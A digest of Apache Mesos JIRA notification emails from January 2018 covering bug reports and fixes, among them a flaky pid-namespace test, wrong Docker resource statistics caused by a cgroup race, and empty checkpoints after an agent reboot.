[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16337043#comment-16337043
 ] 

Qian Zhang commented on MESOS-8305:
---

commit 180129dbd2cc2d8e130e860a4de30d211a69f6be
Author: Qian Zhang 
Date: Tue Jan 23 08:33:03 2018 +0800

Fixed a race in the test `ROOT_MultiTaskgroupSharePidNamespace`.
 
 In the test `DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace`,
 we read the file `ns` in each of the two task's sandbox and check if
 their contents (the pid namespace of the task itself) are same. However
 it is possible we do the read for the second task after that file is
 created but before it is written, i.e., the content we read from the
 `ns` file of the second task would be empty which will cause the check
 failed.
 
 In this patch, we read the file `ns` for each task in a while loop, and
 only break from the loop when both task's files are not empty.
 
 Review: https://reviews.apache.org/r/65278

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Fix For: 1.6.0
>
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 has been committed and likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8480:
--
Description: 
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//cgroup}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}
However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}
This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

  was:
The way we get resource statistics for Docker tasks is through getting the 
cgroup subsystem path through {{/proc//docker}} first (taking the 
{{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read 
{{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
 to get the statistics:
{noformat}
user 4
system 0
{noformat}

However, when a Docker container is being teared down, it seems that Docker or 
the operation system will first move the process to the root cgroup before 
actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to 
[{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
 return a single '/', which in turn makes 
[{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
 read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics 
for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}

This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...

Reading file '/proc/44224/cgroup'
Reading file 
'/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461

Failed to open file '/proc/44224/cgroup'
sleep
[2]-  Exit 1  ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}


> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//cgroup}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then 

[jira] [Commented] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336793#comment-16336793
 ] 

Chun-Hung Hsiao commented on MESOS-8481:


[~jieyu] pointed out that {{rename}} without {{fsync}} might have a 
"zero-length problem": https://stackoverflow.com/a/41362774
Related article: 
https://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/

> Agent reboot during checkpointing may result in empty checkpoints.
> --
>
> Key: MESOS-8481
> URL: https://issues.apache.org/jira/browse/MESOS-8481
> Project: Mesos
>  Issue Type: Bug
>Reporter: Chun-Hung Hsiao
>Assignee: Michael Park
>Priority: Major
>
> An empty checkpoint file was created due to the following incident.
> At 17:12:25, the master assigned a task to an agent:
> {noformat}
> I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources 
> cpus(allocated: *):0.1; mem(allocated: *):128 on agent 
> aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 
> ()
> I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 
> 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at 
> scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources 
> [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at 
> slave(1)@:5051 ()
> {noformat}
> Meanwhile, the agent is being rebooted:
> {noformat}
> $ last reboot
> reboot   system boot  3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09  (06:55)
> {noformat}
> The agent log did not show any information about the task, possibly because 
> there was no fsync before reboot:
> {noformat}
> I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 
> 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot'
> -- Reboot --
> I0123 17:15:40.00  2689 logsink.cpp:89] Added FileSink for glog logs to: 
> /var/log/mesos/mesos-agent.log
> {noformat}
> However, the agent was checkpointing the task before reboot:
> {noformat}
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’
>   Size: 39Blocks: 0  IO Block: 4096   directory
> Device: ca40h/51776d  Inode: 67306254Links: 3
> Access: (0755/drwxr-xr-x)  Uid: (0/root)   Gid: (0/root)
> Context: system_u:object_r:unlabeled_t:s0
> Access: 2018-01-24 00:23:43.237322609 +
> Modify: 2018-01-23 17:12:25.751463030 +
> Change: 2018-01-23 17:12:25.751463030 +
>  Birth: -
> {noformat}
> And since there was no fsync before reboot, all checkpoints resulted in empty 
> files:
> {noformat}
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’
>   Size: 0   Blocks: 0  IO Block: 4096   regular empty file
> Device: ca40h/51776dInode: 33967500Links: 1
> Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
> Context: system_u:object_r:unlabeled_t:s0
> Access: 2018-01-23 17:15:41.485506070 +
> Modify: 2018-01-23 17:12:25.749463047 +
> Change: 2018-01-23 17:12:25.749463047 +
>  Birth: -
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’
>   Size: 0   Blocks: 0  IO Block: 4096   regular empty file
> Device: ca40h/51776dInode: 33967495Links: 1
> Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
> Context: system_u:object_r:unlabeled_t:s0
> Access: 2018-01-23 23:00:42.190975780 +
> Modify: 2018-01-23 17:12:25.749463047 +
> Change: 2018-01-23 17:12:25.749463047 +
>  Birth: -
> $ sudo stat 
> /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info
>   File: 
> ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’
>   Size: 0 Blocks: 0  IO Block: 4096   regular empty file
> Device: ca40h/51776d  Inode: 67306255Links: 1
> Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
> 

[jira] [Updated] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chun-Hung Hsiao updated MESOS-8481:
---
Description: 
An empty checkpoint file was created due to the following incident.

At 17:12:25, the master assigned a task to an agent:
{noformat}
I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources 
cpus(allocated: *):0.1; mem(allocated: *):128 on agent 
aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 ()
I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at 
scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] 
on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 
()
{noformat}
Meanwhile, the agent is being rebooted:
{noformat}
$ last reboot
reboot   system boot  3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09  (06:55)
{noformat}
The agent log did not show any information about the task, possibly because 
there was no fsync before reboot:
{noformat}
I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 
'dcos_checks_agent' to GET the endpoint '/metrics/snapshot'
-- Reboot --
I0123 17:15:40.00  2689 logsink.cpp:89] Added FileSink for glog logs to: 
/var/log/mesos/mesos-agent.log
{noformat}
However, the agent was checkpointing the task before reboot:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’
  Size: 39  Blocks: 0  IO Block: 4096   directory
Device: ca40h/51776dInode: 67306254Links: 3
Access: (0755/drwxr-xr-x)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-24 00:23:43.237322609 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
And since there was no fsync before reboot, all checkpoints resulted in empty 
files:
{noformat}
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967500Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:15:41.485506070 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 33967495Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 23:00:42.190975780 +
Modify: 2018-01-23 17:12:25.749463047 +
Change: 2018-01-23 17:12:25.749463047 +
 Birth: -
$ sudo stat 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info
  File: 
‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’
  Size: 0   Blocks: 0  IO Block: 4096   regular empty file
Device: ca40h/51776dInode: 67306255Links: 1
Access: (0600/-rw---)  Uid: (0/root)   Gid: (0/root)
Context: system_u:object_r:unlabeled_t:s0
Access: 2018-01-23 17:12:25.751463030 +
Modify: 2018-01-23 17:12:25.751463030 +
Change: 2018-01-23 17:12:25.751463030 +
 Birth: -
{noformat}
So were {{forked.pid}} and {{task.info}}.

As a result, the agent failed to recover after reboot:
{noformat}
E0123 17:15:41.00  2709 slave.cpp:6800] EXIT with status 1: Failed to 
perform recovery: Failed to recover framework 
6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from 
'/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info':
 Found an empty file
{noformat}
The error came from 

[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8480:
--
Fix Version/s: 1.5.1
   1.4.2
   1.3.2

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being teared down, it seems that Docker 
> or the operation system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336718#comment-16336718
 ] 

Qian Zhang commented on MESOS-8462:
---

commit 12faca980084c565efdd3b0cfbb3b272d530ba5a
Author: Qian Zhang 
Date: Mon Jan 22 16:14:27 2018 +0800

Updated `SlaveRecoveryTest.RecoverCompletedExecutor` to verify gc.
 
 In the test `SlaveRecoveryTest.RecoverCompletedExecutor`, when the
 completed executor is recovered, verify its work and meta directories
 gc'ed successfully.
 
 Review: https://reviews.apache.org/r/65263

> Unit test for `Slave::detachFile` on removed frameworks.
> 
>
> Key: MESOS-8462
> URL: https://issues.apache.org/jira/browse/MESOS-8462
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Chun-Hung Hsiao
>Assignee: Qian Zhang
>Priority: Major
>  Labels: mesosphere
> Fix For: 1.6.0
>
>
> We should add a unit test for MESOS-8460.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336710#comment-16336710
 ] 

Jie Yu commented on MESOS-8480:
---

commit 1382e595fa5e82f9917df97fbed76f77140ecc1e (HEAD -> master, origin/master, 
origin/HEAD)
Author: Chun-Hung Hsiao 
Date: Tue Jan 23 17:13:05 2018 -0800

Fixed resource statistics for Docker containers being destroyed.

If a process has exited, but not reaped yet (zombie procses),
 `/proc//cgroup` will still exist, but the process's cgroup will be
 reset to the root cgroup. In DockerContainerizer, we rely on
 `/proc//cgroup` to get the cpu/memory statistics of the container.
 If the `usage` call happens when the process is a zombie, the cpu/memory
 statistics will actually be that of the root cgroup, which is obviously
 not correct. See more details in MESOS-8480.

This patch fixed the issue by checking if the cgroup of a given pid is
 root cgroup or not.

Review: https://reviews.apache.org/r/65301/

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.6.0
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being teared down, it seems that Docker 
> or the operation system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.

2018-01-23 Thread Jie Yu (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jie Yu updated MESOS-8480:
--
Fix Version/s: 1.6.0

> Mesos returns high resource usage when killing a Docker task.
> -
>
> Key: MESOS-8480
> URL: https://issues.apache.org/jira/browse/MESOS-8480
> Project: Mesos
>  Issue Type: Bug
>  Components: cgroups
>Reporter: Chun-Hung Hsiao
>Assignee: Chun-Hung Hsiao
>Priority: Major
> Fix For: 1.6.0
>
> Attachments: test.cpp
>
>
> The way we get resource statistics for Docker tasks is through getting the 
> cgroup subsystem path through {{/proc//docker}} first (taking the 
> {{cpuacct}} subsystem as an example):
> {noformat}
> 9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
> {noformat}
> Then read 
> {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}}
>  to get the statistics:
> {noformat}
> user 4
> system 0
> {noformat}
> However, when a Docker container is being teared down, it seems that Docker 
> or the operation system will first move the process to the root cgroup before 
> actually killing it, making {{/proc//docker}} look like the following:
> {noformat}
> 9:cpuacct,cpu:/
> {noformat}
> This makes a racy call to 
> [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935]
>  return a single '/', which in turn makes 
> [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991]
>  read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the 
> statistics for the root cgroup:
> {noformat}
> user 228058750
> system 24506461
> {noformat}
> This can be reproduced by [^test.cpp] with the following command:
> {noformat}
> $ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect 
> sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
> ...
> Reading file '/proc/44224/cgroup'
> Reading file 
> '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
> user 4
> system 0
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Reading file '/proc/44224/cgroup'
> Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
> user 228058750
> system 24506461
> Failed to open file '/proc/44224/cgroup'
> sleep
> [2]-  Exit 1  ./test $(docker inspect sleep | jq 
> .[].State.Pid)
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336702#comment-16336702
 ] 

Qian Zhang commented on MESOS-6822:
---

RR: https://reviews.apache.org/r/65306/

> CNI reports confusing error message for failed interface setup.
> ---
>
> Key: MESOS-6822
> URL: https://issues.apache.org/jira/browse/MESOS-6822
> Project: Mesos
>  Issue Type: Bug
>  Components: network
>Affects Versions: 1.1.0
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid 
> 17067: Success
> {noformat}
> which is produced by this code: 
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available 
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.

2018-01-23 Thread Chun-Hung Hsiao (JIRA)
Chun-Hung Hsiao created MESOS-8481:
--

 Summary: Agent reboot during checkpointing may result in empty 
checkpoints.
 Key: MESOS-8481
 URL: https://issues.apache.org/jira/browse/MESOS-8481
 Project: Mesos
  Issue Type: Bug
Reporter: Chun-Hung Hsiao
Assignee: Michael Park


An empty checkpoint file was created due to the following incident.

At 17:12:25, the master assigned a task to an agent:
{noformat}
I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources 
cpus(allocated: *):0.1; mem(allocated: *):128 on agent 
aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 ()
I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 
